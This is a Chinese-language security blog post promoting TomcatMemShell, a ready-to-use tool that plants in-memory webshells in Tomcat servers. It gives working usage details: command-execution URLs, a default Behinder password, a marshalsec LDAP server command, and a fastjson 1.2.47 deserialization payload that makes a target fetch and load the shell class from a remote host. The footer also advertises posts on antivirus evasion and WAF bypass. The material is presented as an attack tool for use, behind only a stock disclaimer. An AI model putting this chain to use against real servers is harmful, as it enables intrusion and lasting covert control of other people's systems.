项目作者:ce-automne
项目地址:https://github.com/ce-automne/TomcatMemShell
一、工具简介
拿来即用的Tomcat7/8/9/10版本Listener/Filter/Servlet内存马,支持注入CMD内存马和冰蝎内存马。
二、使用方法
1、Listener型/Filter型:
CMD内存马URL:xx.xx.xx.xx/?chan=whoami
冰蝎内存马URL:xx.xx.xx.xx/ 默认连接密码:goautomne
2、Servlet型:
CMD内存马URL: xx.xx.xx.xx/p?chan=whoami
冰蝎内存马URL: xx.xx.xx.xx/p 默认连接密码:goautomne
三、利用举例
以fastjson1.2.47版本的反序列化漏洞为例,将对应Tomcat版本的class文件,这里以ILRain.class为例,上传到web服务器,并开启LDAP服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://xx.xx.xx.xx/#ILRain 9102
然后再打入fastjson漏洞的poc,就可以使用冰蝎客户端去连接了
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://xx.xx.xx.xx:9102/123",
"autoCommit":true
}
}
四、下载地址
1、通过项目地址下载
后台回复“20220509”也可获取
>精彩回顾<
Cobalt Strike免杀脚本生成器|cna脚本|bypassAV
xss bypass备忘单|xss绕过防火墙技巧|xss绕过WAF的方法
【贼详细 | 附PoC工具】Apache HTTPd最新RCE漏洞复现
关注我
获得更多精彩
坚持学习与分享!走过路过点个"在看",不会错过
仅用于学习交流,不得用于非法用途
如侵权请私聊公众号删文
觉得文章不错给点个‘再看’吧
原文始发于微信公众号(EchoSec):【神兵利器 | 附下载】开箱即用的内存马
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论